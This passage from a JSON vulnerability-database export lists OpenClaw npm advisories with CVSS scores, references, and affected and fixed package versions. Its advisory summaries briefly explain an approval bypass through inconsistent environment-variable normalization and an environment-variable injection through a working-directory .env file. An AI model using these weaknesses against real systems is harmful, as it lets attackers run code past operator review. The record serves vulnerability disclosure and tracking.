C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1"
,"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41294","reference_id":"CVE-2026-41294","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41294"},{"reference_url":"https://github.com/advisories/GHSA-8rh7-6779-cjqq","reference_id":"GHSA-8rh7-6779-cjqq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8rh7-6779-cjqq"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file","reference_id":"openclaw-environment-variable-injection-via-cwd-env-file","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnera
bility":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnera
bility":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnera
bility":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41294","GHSA-8rh7-6
779-cjqq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1smq-mbty-jkaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90105?format=json","vulnerability_id":"VCID-1ufd-uuqk-nbdv","summary":"Duplicate Advisory: OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3x4-hc5v-v2gm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject attacker-controlled environment variables into execution without approval system validation. Attackers can exploit differing normalization logic to discard non-portable keys during approval processing while accepting them at execution time, bypassing operator review and potentially influencing runtime behavior including execution of attacker-controlled 
binaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"},{"reference_url":"https://github.com/openclaw/openclaw/pull/59182","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/59182"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"},{"reference_url":"https://nvd.nist.gov/vuln/de
tail/CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"},{"reference_url":"https://github.com/advisories/GHSA-8h8f-7cxm-m38j","reference_id":"GHSA-8h8f-7cxm-m38j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8h8f-7cxm-m38j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerabi
lity":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerabi
lity":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerabi
lity":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerabi
lity":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerabi
lity":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-8h8f-7cxm-m38j"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1ufd-uuqk-nbdv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91695?format=json","vulnerability_id":"VCID-1y7e-y41k-qyfc","summary":"OpenClaw: Unavailable local auth SecretRefs could fall through to remote credentials in local mode\n## Summary\nIn affected versions of `openclaw`, local gateway helper credential resolution treated configured but unavailable `gateway.auth.token` and `gateway.auth.password` SecretRefs as if they were unset and could fall back to 